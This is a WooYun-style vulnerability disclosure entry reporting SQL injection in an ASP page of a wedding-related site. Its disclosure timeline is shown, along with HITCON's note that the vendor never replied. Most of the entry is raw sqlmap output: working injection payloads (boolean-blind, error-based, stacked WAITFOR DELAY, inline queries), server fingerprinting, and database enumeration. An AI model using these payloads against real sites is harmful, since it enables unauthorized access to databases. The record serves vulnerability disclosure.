乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
Target: http://**.**.**.**/photosview/lover_map.asp?id=1Host IP: **.**.**.**Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETDB Server: MSSQL 2000 with errorResp. Time(avg): 2747 msCurrent User: madminSql Version: Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) Jul 9 2008 14:17:44 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)Current DB: wed168System User: madminHost Name: A-WED168-COM-TWServer Name: SQL-2008 master tempdb model msdb ReportServer ReportServerTempDB wed168 wed1681
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5799=5799 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1 AND 2308=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(100)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2308=2308) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(112)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(100)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2094=2094) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(112)+CHAR(113))---[11:24:28] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008http://**.**.**.**/photosview/lover_map.asp?id=1available databases [8]:[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] wed168[*] wed1681
可给用户群发信息
危害等级:高
漏洞Rank:17
确认时间:2015-11-27 21:59
感謝通報
2016-01-07:HITCON 於接獲通報後除多次 email 該網站所示之服務信箱外,亦曾致電該公司告知此漏洞,但對方至今仍無回應。